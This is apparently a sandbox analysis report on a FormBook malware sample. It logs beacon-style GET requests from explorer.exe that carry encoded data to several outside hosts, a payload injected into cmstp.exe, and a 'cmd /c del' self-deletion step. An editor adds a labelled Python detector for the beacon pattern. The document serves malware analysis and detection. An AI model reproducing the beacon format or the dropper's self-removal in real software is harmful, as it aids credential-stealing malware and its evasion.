                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6b 6b 65 6b 2e 6e 6c 2f 77 70 2f 64 65 2d 6b 6e 75 74 73 65 6c 6b 65 65 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.skkek.nl/wp/de-knutselkeet/">here</a>.</p></body></html>


Session ID: 9
Source IP: 192.168.2.3
Source Port: 49743
Destination IP: 45.88.202.115
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 11:10:59.077899933 CEST | kBytes transferred: 5165 | Direction: OUT
Data: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1
Host: www.autotrafficbot.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 8, 2021 11:10:59.105108976 CEST | kBytes transferred: 5166 | Direction: IN
Data: HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 08 Apr 2021 09:10:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
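The sessions above share one request template: explorer.exe sends GET /evpn/?JDK8ix=<long base64-alphabet value>&w4=jFNp36Ihu with a seven-byte null body and Connection: close to four unrelated hosts, and every host answers with a redirect or a 400. The constant path, the constant query-key names, the constant trailing value and the rotating Host header are what a network analyst can key on. The following detector is an added example written by the editor, not part of the sandbox report: it groups GET requests by that template per process and flags any template that reaches several distinct hosts with a base64-looking payload. The log lines are constructed from the four requests shown above plus two invented benign browser requests, and the log format (timestamp|process|host|request line|status) is an assumption.

```python
"""Spot a FormBook-style beacon template reused across unrelated hosts.

Added example by the editor, not part of the sandbox report. The log lines
are constructed from the four explorer.exe requests shown above; the log
format "timestamp|process|host|request line|status" is an assumption.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input, modelled on sessions 6-9 above plus two invented benign
# browser requests so the detector has something it must not flag.
SAMPLE_LOG = """\
2021-04-08T09:10:38Z|C:\\Windows\\explorer.exe|www.theholisticbirthco.com|GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1|400
2021-04-08T09:10:48Z|C:\\Windows\\explorer.exe|www.tor-one.com|GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1|302
2021-04-08T09:10:53Z|C:\\Windows\\explorer.exe|www.de-knutselkeet.com|GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1|301
2021-04-08T09:10:59Z|C:\\Windows\\explorer.exe|www.autotrafficbot.com|GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1|301
2021-04-08T09:11:05Z|C:\\Program Files\\Mozilla Firefox\\firefox.exe|www.example.org|GET /search?q=weather&page=2 HTTP/1.1|200
2021-04-08T09:11:07Z|C:\\Program Files\\Mozilla Firefox\\firefox.exe|www.example.org|GET /search?q=news&page=2 HTTP/1.1|200
"""

B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def looks_base64(value, min_len=32):
    """True for a long run of standard-alphabet base64. In the requests above
    '+' and '/' travel unencoded, which a browser would not do in a query."""
    return len(value) >= min_len and set(value) <= B64_ALPHABET


def parse_line(line):
    """Split one constructed log line into its fields."""
    ts, process, host, request_line, status = line.split("|")
    method, target, _version = request_line.split(" ", 2)
    return {"ts": ts, "process": process, "host": host,
            "method": method, "target": target, "status": int(status)}


def beacon_template(target):
    """Reduce a request target to what stays constant across the hosts:
    the path, the ordered query-key names and the value of the last key.
    The query is split by hand so '+' in a value is not turned into a space.
    Returns (template, first_value) so the caller can inspect the payload."""
    parts = urlsplit(target)
    pairs = [p.split("=", 1) if "=" in p else [p, ""]
             for p in parts.query.split("&") if p]
    keys = tuple(k for k, _ in pairs)
    values = [v for _, v in pairs]
    fixed = values[-1] if values else ""
    payload = values[0] if values else ""
    return (parts.path, keys, fixed), payload


def find_beacon_clusters(log_text, min_hosts=3):
    """Group GET requests by (process, template) and report every group that
    reaches at least min_hosts distinct hosts; the response codes are kept so
    the analyst can see that none of the decoys answered 200."""
    groups = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec["method"] != "GET":
            continue
        template, payload = beacon_template(rec["target"])
        rec["payload"] = payload
        groups[(rec["process"], template)].append(rec)

    clusters = []
    for (process, (path, keys, fixed)), recs in groups.items():
        hosts = sorted({r["host"] for r in recs})
        if len(hosts) < min_hosts:
            continue
        clusters.append({
            "process": process,
            "path": path,
            "keys": keys,
            "fixed_value": fixed,
            "hosts": hosts,
            "statuses": sorted({r["status"] for r in recs}),
            "base64_like_payload": all(looks_base64(r["payload"]) for r in recs),
        })
    return clusters


if __name__ == "__main__":
    for c in find_beacon_clusters(SAMPLE_LOG):
        print(f"{c['process']} -> {c['path']} keys={c['keys']} "
              f"fixed={c['fixed_value']} hosts={len(c['hosts'])} "
              f"statuses={c['statuses']} b64={c['base64_like_payload']}")
```

On the constructed log this yields a single cluster: explorer.exe, path /evpn/, keys (JDK8ix, w4), fixed value jFNp36Ihu, four hosts, statuses 301/302/400. The two firefox.exe requests share a template but only one host, so they are not reported. The grouping is on the trailing fixed value rather than the long first value on purpose: the first value changes on every request, the last one does not.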


Behavior

                                                                        System Behavior

General

Start time: 11:09:16
Start date: 08/04/2021
Path: C:\Users\user\Desktop\TazxfJHRhq.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\TazxfJHRhq.exe'
Imagebase: 0x400000
File size: 207024 bytes
MD5 hash: F818665DD48A93C48255D3CEADF92A6E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:09:17
Start date: 08/04/2021
Path: C:\Users\user\Desktop\TazxfJHRhq.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\TazxfJHRhq.exe'
Imagebase: 0x400000
File size: 207024 bytes
MD5 hash: F818665DD48A93C48255D3CEADF92A6E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Note: second instance of the same image, started one second after the first with an identical command line. The FormBook Yara matches below include the region at 0x400000, this process's image base, in both the first and the second memory dump.
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:09:22
Start date: 08/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Note: this is the process recorded in the Process column of the HTTP sessions above, i.e. the one that issued the /evpn/ requests.
Reputation: high

General

Start time: 11:09:32
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cmstp.exe
Imagebase: 0x1190000
File size: 82944 bytes
MD5 hash: 4833E65ED211C7F118D4A11E6FB58A09
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Note: a 32-bit system binary started with no arguments; the FormBook Yara matches at 0x400000 and in two further regions show that it hosts the FormBook payload.
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:09:37
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
Imagebase: 0x10a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Note: the command line deletes the original sample from the Desktop, so the dropper removes itself from disk once the payload is running elsewhere.
Reputation: high

General

Start time: 11:09:37
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
